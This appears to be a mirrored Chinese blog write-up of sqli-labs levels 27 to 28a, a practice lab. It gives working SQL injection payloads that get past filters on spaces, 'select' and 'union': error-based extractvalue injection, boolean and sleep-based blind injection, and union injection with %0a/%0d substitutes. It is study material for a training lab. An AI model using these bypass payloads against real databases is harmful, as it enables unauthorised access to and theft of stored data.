zoukankan      html  css  js  c++  java
  • sqli-labs(十二)(union以及select的过滤)

    第二十七关:

    这关禁用了空格和select,空格还是可以使用()代替,select发现可以大小写绕过

    输入?id=1'||extractvalue(1,concat(0x5c,(selEct(group_concat(schema_name))from(information_schema.schemata))))||'1'='1

    这里还有个问题就是,空格被过滤了,貌似不能使用联合注入了。网上有人说可以使用%0a ,是可以的

    还可以使用内联注释的/*! content */  但是这关过滤了/*  所以不行,不过我在第一关中尝试了 是可以的

    第二十七a关:

    和第二十七关一样,只是需要将报错注入改成盲注。

    输入?id="||substr((seLEct(user())),1,1)="r

     使用延时的盲注如下

    输入:?id="||if((substr((seLEct(user())),1,1)="r"),sleep(1),1)||"2"="1

    第二十八关:

    先看源码

    s代表先去掉多有空格,报错%0a,/i表示忽略大小写。

    可以输入?id=0')union(select%0d1,database(),'3

    第二十八a关:

    比二十八关的过滤还少些,就不多说了。直接使用上面的expload就行。

  • 相关阅读:
    77. Combinations
    76. Minimum Window Substring
    75. Sort Colors
    74. Search a 2D Matrix
    73. Set Matrix Zeroes
    72. Edit Distance
    71. Simplify Path
    70. Climbing Stairs
    线段树+欧拉函数——cf1114F
    区间dp——好题cf1132F
  • 原文地址:https://www.cnblogs.com/jinqi520/p/9573210.html
Copyright © 2011-2022 走看看